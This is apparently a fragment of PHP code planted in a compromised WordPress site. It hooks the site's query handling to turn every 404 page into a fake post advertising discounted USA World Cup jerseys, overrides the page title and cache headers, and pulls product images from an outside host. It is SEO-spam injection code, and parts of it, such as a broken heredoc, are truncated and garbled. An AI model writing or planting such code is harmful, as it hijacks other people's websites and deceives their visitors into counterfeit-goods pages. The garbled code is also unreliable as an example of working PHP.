$wp->main( "" ); add_filter( 'pre_get_document_title', function( $title ){ $title="online discount USA National Team 2022 Qatar World Cup Kellyn Acosta #23 White Home Men Jersey"; return $title; }, 999, 1 ); function hook_nocache() { echo << code; } add_action('wp_head', 'hook_nocache',4); function kpg_f_content() { global $wp_query; if($wp_query->is_404 ) { $wp_query->found_posts = 1; $wp_query->post_count = 1; $wp_query->max_num_pages = 1; $wp_query->is_single = 1; $wp_query->is_404 = false; $wp_query->is_posts_page = 1; $wp_query->page=false; $wp_query->is_post=true; $wp_query->page=false; } } function confirm_pages( $posts ) { //do all the stuff here $posts = null; $post = new stdClass(); $post -> post_category = array('ebay'); $post->post_content = 'Online Discount USA National Team 2022 Qatar World Cup Kellyn Acosta #23 White Home Men Jersey

Online Discount USA National Team 2022 Qatar World Cup Kellyn Acosta #23 White Home Men Jersey

'; $post->post_excerpt="Online Discount USA National Team 2022 Qatar World Cup Kellyn Acosta #23 White Home Men Jersey"; $post->post_title = "Online Discount USA National Team 2022 Qatar World Cup Kellyn Acosta #23 White Home Men Jersey"; $post->post_images = "http://wpa.icu/images/dggief/s/online-discount-usa-national-team-2022-qatar-world-cup-kellyn-acosta-23-white-home-men-jersey.jpg"; $post->post_types = "post"; $post->comment_status = "publish"; $post->filter = 'raw'; $post->post_date = current_time( 'mysql' ); $post->post_date_gmt = current_time( 'mysql', 1 ); $posts[] = $post; return $posts; } add_action('wp', 'kpg_f_content'); add_filter( 'the_posts', 'confirm_pages' );